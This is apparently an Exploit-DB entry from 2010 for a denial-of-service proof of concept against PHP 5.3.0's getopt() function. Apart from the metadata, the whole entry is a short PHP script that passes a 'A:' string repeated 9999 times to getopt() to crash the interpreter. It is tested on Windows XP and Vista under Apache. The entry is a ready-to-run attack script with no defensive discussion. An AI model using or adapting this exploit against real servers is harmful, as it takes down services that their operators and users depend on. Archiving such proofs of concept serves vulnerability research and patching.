PHP 5.3.0 - 'getopt()' Denial of Service

EDB-ID:

12165

CVE:

N/A

Author:

Napst3r

Type:

dos

Platform:

Multiple

Published:

2010-04-12

<?php
#####################################################################
## PHP 5.3.0 getopt() Denial of service
## Tested on WIN XP FR SP3, WIN VISTA FR SP2, Apache, PHP 5.3.0
## Denial of service
## Author: Napst3r
## Greets To: My Laptop &  all My Friends
#####################################################################

$buffer  = str_repeat('A:', 9999);
$options = getopt($buffer);

?>